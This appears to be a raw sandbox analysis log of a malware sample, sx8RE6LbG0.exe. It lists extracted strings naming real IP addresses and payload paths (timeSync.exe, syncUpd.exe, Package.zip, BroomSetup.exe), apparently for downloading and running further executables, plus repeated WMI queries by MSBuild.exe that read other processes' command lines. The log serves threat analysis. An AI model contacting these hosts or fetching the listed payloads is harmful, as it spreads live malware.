Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: @	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75

Source: sx8RE6LbG0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1936
